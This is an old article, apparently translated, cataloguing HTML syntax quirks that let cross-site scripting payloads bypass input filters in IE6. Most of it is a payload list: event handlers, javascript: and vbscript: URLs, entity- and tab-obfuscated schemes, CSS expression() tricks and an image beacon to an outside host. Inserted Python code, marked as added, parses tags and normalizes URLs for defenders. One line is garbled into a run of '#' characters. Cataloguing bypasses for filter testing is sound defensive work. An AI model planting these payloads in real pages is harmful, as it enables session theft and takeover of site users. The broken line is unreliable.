Features of HTML Syntax

Authors: Algol, zFailure (last updated 13.06.2005)

One of the main ways of protecting sites against XSS vulnerabilities is filtering the characters a user is allowed to enter. This article describes features of HTML syntax that allow such filters to be bypassed.

Note that XSS vulnerabilities are browser-dependent. All examples below were tested in IE6; in other versions or other browsers they may not work. For example, the backtick (`) is treated as an attribute value delimiter only in IE; other browsers, Opera for instance, do not treat it as a delimiter at all.

  • Attribute separators.
    Besides the space, the following characters may separate attributes: slash ( / ), tab, line feed. The separator may be omitted altogether when the preceding attribute value is enclosed in quotes.
     <img/src="1.png"/alt="Hint"/border="0">
     <img src="1.png" alt="Hint" border="0"> (tab characters as separators)
     <img
     src="1.png"
     alt="Hint"
     border="0">
     <img src="1.png"alt="Hint"border="0"> (separators omitted after quoted values)
    
  • Attribute value delimiters
    Values may be enclosed in double quotes, single quotes (apostrophes) or backticks, or left unquoted altogether.
     <img src="" alt="My tip" border="0">
     <img src="" alt='My tip' border="0">
     <img src="" alt=`My tip` border="0">
     <img src="" alt=Tip border="0">
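The following Python snippet is an added example, not code from the original article: a lenient tag parser that reproduces the separator and delimiter rules of the two sections above, so that a server-side filter sees the same attributes the browser does instead of splitting on spaces alone. The names SEPARATORS, WS, QUOTES and parse_tag are the example's own.

```python
import re

# What legacy IE accepted around attributes, per the two sections above:
# any whitespace or '/' separates attributes; a value may be wrapped in
# double quotes, apostrophes or (IE only) backticks, or left unquoted.
SEPARATORS = " \t\n\r\x0c/"
WS = " \t\n\r\x0c"
QUOTES = "\"'`"


def parse_tag(tag):
    """Split one tag into (name, {attribute: value}) the browser's lenient way:
    a filter that splits on spaces alone sees one attribute where the browser
    sees several.  Names are lowercased, values are returned as written."""
    body = tag.strip()
    if not (body.startswith("<") and body.endswith(">")):
        raise ValueError("expected a single tag such as <img ...>")
    body = body[1:-1]
    m = re.match(r"[A-Za-z][A-Za-z0-9]*", body)
    if not m:
        raise ValueError("no tag name")
    name, i, n, attrs = m.group(0).lower(), m.end(), len(body), {}
    while i < n:
        while i < n and body[i] in SEPARATORS:             # skip separators
            i += 1
        j = i
        while j < n and body[j] not in SEPARATORS + "=":   # attribute name
            j += 1
        attr, i = body[i:j].lower(), j
        while i < n and body[i] in WS:
            i += 1
        value = ""
        if i < n and body[i] == "=":
            i += 1
            while i < n and body[i] in WS:
                i += 1
            if i < n and body[i] in QUOTES:   # quoted: runs to the same quote
                end = body.find(body[i], i + 1)
                end = n if end == -1 else end
                value, i = body[i + 1:end], end + 1
            else:                             # unquoted: runs to whitespace
                j = i
                while j < n and body[j] not in WS:
                    j += 1
                value, i = body[i:j], j
        if attr:
            attrs[attr] = value
    return name, attrs
```

Whatever the separator or delimiter, the parser returns the same three attributes for every variant listed in the two sections above, which is the comparison a filter should be making.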
    
  • Character encodings
    Character references in a script are decoded before the script is executed:
     <img src=javascript:alert(&quot;ok&quot;)>
     <img src=javascript:alert(&#039;ok&#039;)>
     <Img src = & ##################################################################### &
     <a href=javascript:alert(%22ok%22)>click me</a> (URL-encoding works only in the href attribute)
    
  • Delimiters of string literals in scripts
     <img src=javascript:alert('ok')>
     <img src=javascript:alert("ok")>
     <img src=javascript:a=/ok/;alert(a.source)>
     <img src=javascript:alert(String.fromCharCode(111,107))>
    
  • Bypassing filters on particular characters
     <img src=javascript:i=new/**/Image();i.src='http://bla.bla'> (the comment /**/ replaces the space)
    
  • Ways of running scripts
    Several ways to run a script automatically:
     <script>alert('ok')</script>
     <script src=1.js></script>
     <body onload=alert('ok')>
     <meta http-equiv=Refresh content=0;url=javascript:alert('ok')>
     <image src=1.png onload=alert('ok')>
     <image src=javascript:alert('ok')>
     <image src="" onerror=alert('ok')>
     <hr style=background:url(javascript:alert('ok'))>
     <span style=top:expression(alert('ok'))></span>
     <span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></span> (works only once)
     <style type="text/css">@import url(javascript:alert('ok'));</style>
     <object classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('ok')></object>
     <embed src=javascript:alert('ok');this.avi>
     <embed src=javascript:alert('ok');this.wav>
     <iframe src=javascript:alert('ok')> (IE only)
     <a href=javascript:alert(%22ok%22)>click me</a> (runs only when the link is clicked)
     <a href=javascript:alert('aaa'+eval('alert();i=2+2')+'bbb')>click me</a> (runs only when the link is clicked)
     <br size="&{alert('XSS')}"> (Netscape 4.x only)
    
  • Script protocols and ways of writing them
     <img src=javascript:alert()>
     <img src=vbscript:AleRt()>
     <img src=JaVasCriPt:alert()>
     <img src="  javascript:alert()"> (spaces before javascript)
     
     <img src=&#106&#97&#118&#97&#115&#112&#116:alert()>
     <img src=javascript&#9:alert()>
     <img src=javascript&#10:alert()>
     <img src=javascript&#13:alert()>
     <img src="javascript
     :alert()"> (the line break stands for a tab character before the colon)
     
     <img src="java
     scri
     pt:ale
     rt()"> (the line breaks stand for tab and carriage return characters inside the word javascript)
     
    
  • Inserting scripts in a style attribute
    Statements of a script inside a style attribute must be separated with " \; ".
     <hr style=`background:url(javascript:alert('ok 1')\;alert('ok 2'))`>
    
  • Special tags.
     <image src="1.png" alt="" border="0"> (works the same way as img)
     <plaintext> (everything after this tag is treated as plain text, not HTML)
     <textarea> (everything after this tag is treated as plain text, not HTML)
     <xml> (everything after this tag is not displayed at all)
     
  • Table of frequently used codes:

    Symbol              Decimal encoding   Hexadecimal encoding*   Named entity   URL-encoding
    "                   &#34               &#x22;                  &quot;         %22
    '                   &#39               &#x27;                                 %27
    `                   &#96               &#x60;                                 %60
    <space>             &#32               &#x20;                                 +
    <tab>               &#9                &#x09;                                 %09
    <carriage return>   &#13               &#x0D;                                 %0D
    =                   &#61               &#x3D;                                 %3D
    <                   &#60               &#x3C;                  &lt;           %3C
    >                   &#62               &#x3E;                  &gt;           %3E
    \                   &#92               &#x5C;                                 %5C
    %                   &#37               &#x25;                                 %25
    +                   &#43               &#x2B;                                 %2B
    <soft hyphen>       &#173              &#xAD;                  &shy;          %AD
    &                   &#38               &#x26;                  &amp;          %26

    * In some cases the semicolon may be omitted (when the character is at the end of the line, or when several characters in this encoding follow one another).
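As an added example (not part of the original article) covering the "Character encodings" and "Script protocols" sections and the table above: a Python normalizer that decodes decimal, hexadecimal and named references with or without the semicolon, percent-decodes only for href, strips the tab, LF and CR characters IE ignored inside a scheme, and then recognizes javascript:/vbscript: values. The names NAMED, decode_refs, normalize_url and is_script_url are the example's own.

```python
import re
from urllib.parse import unquote

# Named references from the table above; the tab/CR/LF rows are what make
# the "javascript&#9:" style of writing a scheme possible.
NAMED = {"quot": '"', "lt": "<", "gt": ">", "amp": "&", "shy": "\xad"}

# Decimal (&#34), hexadecimal (&#x22) or named (&quot) reference.  The
# closing semicolon is optional, as the table's footnote states, so a
# filter that insists on "&...;" misses most of the variants on this page.
_REF = re.compile(
    r"&(?:#(?P<dec>[0-9]+)|#[xX](?P<hex>[0-9a-fA-F]+)|(?P<name>[A-Za-z]+));?")


def decode_refs(value):
    """Replace character references with the characters the browser sees."""
    def repl(m):
        if m.group("dec") or m.group("hex"):
            cp = int(m.group("dec") or m.group("hex"), 10 if m.group("dec") else 16)
            return chr(cp) if cp <= 0x10FFFF else m.group(0)
        return NAMED.get(m.group("name").lower(), m.group(0))
    return _REF.sub(repl, value)


def normalize_url(value, in_href=False):
    """Canonical form of a URL-valued attribute (src, href, url(...)).
    Steps mirror the quirks listed above: decode references, percent-decode
    only for href (URL-encoding takes effect there alone), drop leading
    whitespace, delete tab/LF/CR inside the scheme and lowercase it."""
    s = decode_refs(value)
    if in_href:
        s = unquote(s)
    s = s.lstrip()
    scheme, colon, rest = s.partition(":")
    scheme = re.sub(r"[\t\n\r]", "", scheme).lower()
    return scheme + colon + rest


def is_script_url(value, in_href=False):
    """True when the normalized value runs script instead of fetching a URL."""
    return normalize_url(value, in_href).partition(":")[0] in ("javascript", "vbscript")


if __name__ == "__main__":
    # Constructed samples built from the variants listed on this page.
    for v in ["JaVasCriPt:alert()", "javascript&#9:alert()", "  javascript:alert()",
              "java\tscri\rpt:alert()", "vbscript:AleRt()", "http://example.com/1.png"]:
        print(repr(v), "->", repr(normalize_url(v)), is_script_url(v))
```

The point for a defender is the order of operations: decode first, then strip, then compare, because a check run on the raw attribute string is comparing against something the browser never sees.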

    See similar: http://ha.ckers.org/xss.html